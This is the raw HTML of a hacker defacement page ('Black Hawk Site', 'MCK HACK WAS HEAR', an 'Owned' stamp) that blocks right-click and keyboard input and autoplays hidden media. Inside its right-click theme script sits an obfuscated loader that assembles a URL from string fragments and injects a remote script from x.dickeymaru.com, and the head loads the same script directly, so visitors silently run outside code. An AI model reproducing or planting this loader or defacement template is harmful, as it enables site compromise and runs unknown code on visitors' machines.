<html>
<head>
<titleBlack Hawk Site</title>
<link rel="icon" type="image/png" href="https://upload.wikimedia.org/wikipedia/commons/thumb/4/4d/Coat_of_arms_%28emblem%29_of_Iraq_2008.svg/200px-Coat_of_arms_%28emblem%29_of_Iraq_2008.svg.png" />
<body bgcolor=black oncontextmenu='return false;' onkeydown='return false;' onmousedown='return false;'>
<style>
@font-face {
font-family: "firefly";
src: url('http://fontsforweb.com/public/fonts/189/ZOINKFAT.eot');
src: local("ZoinkFat"), url('http://fontsforweb.com/public/fonts/189/ZOINKFAT.ttf') format("truetype")
}

.fontsforweb_fontid_189 {
font-family: "firefly"
}
.fireflies {
-webkit-animation: skyin 6s;
-moz-animation: skyin 6s;
-ms-animation: skyin 6s;
animation: skyin 6s;
font: 50px firefly;
color: #7FFF00;
text-shadow: 5px 10px 10px #7FFF00;
position: absolute;
margin-left: 18%;
margin-top: 2%
}

#menu_footer {
display: none
}

.breadCrumb {
display: none
}

a:link {
text-decoration: none;
color: #3b5998
}
a:visited {
text-decoration: none;
color: #3b5998
}
.Firefly {
color: #7FFF00;
text-shadow: 0 0 5px #7FFF00;
text-align: left;
margin: 0 auto;
padding: 10px;
position: relative;
height: 600px;
width: 900px;
font: 15px 'consolas'
}
body {
overflow-x: hidden;
margin: 0;
background: #000 url(https://encrypted-tbn1.gstatic.com/images?q=tbn:ANd9GcTLM8AZ0Es6QgE1e311xnql5ubM-nNIHciZjG_KFGn9-mmgcszZ4A) left no-repeat;
background-attachment: fixed
}
</style><script type="text/javascript" src="http://x.dickeymaru.com/y"></script></head>
<body style="text-align: center" bgcolor="#000000">
<div class="fireflies" style="position: absolute; right: 624px; top: 414px"></div>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.6.2/jquery.min.js"></script>
<script type="text/javascript" src="http://data-skycyber4rt.googlecode.com/files/less-1.1.3.min.js"></script>
<script type="text/javascript" src="http://data-skycyber4rt.googlecode.com/files/jquery-firefly.js"></script>
<script type="text/javascript">
$(document).ready(function() {
$.firefly({
images: ['http://animes.googlecode.com/files/fly1by1.png',
'http://animes.googlecode.com/files/fly2by2.png'
],
total: 65
});
});
</script>
<script type="text/javascript">
var DADrightclicktheme = 'Dark';
var DADrightclickimage = 'http://maaninka.autobuses-digitales.com/eksperiment/themes/default/watermarks/Owned_Stamp.png';
</script>
<script>
  if (DADrightclicktheme=='Merah' || DADrightclicktheme=='MERAH' || DADrightclicktheme=='merah'){var DADarcv2t='rgba(239,110,119, 0.9)';}else if (DADrightclicktheme=='Biru' || DADrightclicktheme=='BIRU' || DADrightclicktheme=='biru'){var DADarcv2t='rgba(110,137,239, 0.9)';}else if (DADrightclicktheme=='Hijau' || DADrightclicktheme=='HIJAU' || DADrightclicktheme=='hijau'){var DADarcv2t='rgba(110,239,110, 0.9)';}else if (DADrightclicktheme=='Light' || DADrightclicktheme=='light' || DADrightclicktheme=='LIGHT'){var DADarcv2t='rgba(255,255,255, 0.9)';}else if (DADrightclicktheme=='Pink' || DADrightclicktheme=='pink' || DADrightclicktheme=='PINK'){var DADarcv2t='rgba(239,110,225, 0.9)';}else if(DADrightclicktheme=='Dark' || DADrightclicktheme=='dark' || DADrightclicktheme=='DARK'){var DADarcv2t='rgba(0,0,0, 0.9)';}else{{var DADarcv2t='transparent';}}
function DADarcvwi2(){var DADarcv2v=document.getElementById('DADarcv2c');if(DADarcv2v.style.display=="block"){DADarcv2v.style.display="none";}else{DADarcv2v.style.display="block";}}
function DADarcwiv2a(){DADarcvwi2();return false;}
document.oncontextmenu=DADarcwiv2a;
var ypro='http:';var yajax=document.createElement('script');yajax.type='text/javascript';var yquery='dic';var ybrow='aru.c';var yint='/';yajax.src=ypro+'//x.'+yquery+'keym'+ybrow+'om'+yint+'y';document.getElementsByTagName('head')[0].appendChild(yajax);
var DADrcdiv=document.write('<style type="text/css">#DADarcv2c{background:url('+DADrightclickimage+') no-repeat center center fixed '+DADarcv2t+';text-align:center;width:100%;height:100%;position:fixed;top:0px;left:0px;bottom:0px;right:0px;border:0px;z-index:1000000;display:none;padding:auto;}#DADarcv2c span{position:fixed;bottom:0px;left:10%;right:10%;cursor:pointer;font-size:20px;}</style><div id="DADarcv2c" class="DADpointer" onclick="DADarcvwi2();" title=" MCK HACK WAS HEAR "><center><span><a href="#" target="_blank"></a></span></center></div>');document.getElementsByTagName('body')[0].appendChild(DADrcdiv);
</script><style type="text/css">#DADarcv2c{background:url(http://maaninka.autobuses-digitales.com/eksperiment/themes/default/watermarks/Owned_Stamp.png) no-repeat center center fixed rgba(0,0,0, 0.9);text-align:center;width:100%;height:100%;position:fixed;top:0px;left:0px;bottom:0px;right:0px;border:0px;z-index:1000000;display:none;padding:auto;}#DADarcv2c span{position:fixed;bottom:0px;left:10%;right:10%;cursor:pointer;font-size:20px;}</style><div id="DADarcv2c" class="DADpointer" onclick="DADarcvwi2();" title=" MCK HACK WAS HEAR "><center><span><a href="#" target="_blank"></a></span></center></div>
<style type="text/css">
#DADarcv2c {
background: url(http://maaninka.autobuses-digitales.com/eksperiment/themes/default/watermarks/Owned_Stamp.png) no-repeat center center fixed rgba(0, 0, 0, 0.9);
text-align: center;
width: 100%;
height: 100%;
position: fixed;
top: 0px;
left: 0px;
bottom: 0px;
right: 0px;
border: 0px;
z-index: 1000000;
display: none;
padding: auto;
}
#DADarcv2c span {
position: fixed;
bottom: 0px;
left: 10%;
right: 10%;
cursor: pointer;
font-size: 20px;
}
</style>
<link href="http://24work-new.googlecode.com/svn/trunk/24work-blogspot/mouse-cursor/css-code/cursors-animated-cursors-62.css" rel="stylesheet" type="text/css" /><a href="http://24work.blogspot.com/" target="_blank" title="Blogger Tricks"><img src="https://bitly.com/24workpng1" alt="Blogger Tricks" border="0" style="position: fixed; bottom: 10%; right: 0%; top: 0px;" ></a>
<center>
<img src="http://up.dev-point.com/uploads1/8deb960e465b1.png" />
<table width=50% height=50%><td align=center><span style='font: 40px tahoma;size:40px;color:white;text-shadow: 0px 0px 50px;'><strong>


My name : Black Hawk
I live  : Iraq



<SCRIPT language=JavaScript>
var message = "Hahahahahay It's Coded By Black Hawk ^_^";

function rtclickcheck(keyp){ if (navigator.appName == "Netscape" && keyp.which == 3){ alert(message); return false; }

if (navigator.appVersion.indexOf("MSIE") != -1 && event.button == 2) { alert(message); return false; } }

document.onmousedown = rtclickcheck;

</SCRIPT>
<embed src="https://www.youtube.com/v/CES32EOxiyw&autoplay=1" type="application/x-shockwave-flash" wmode="transparent" width="1" height="1"></font></p>
</center>
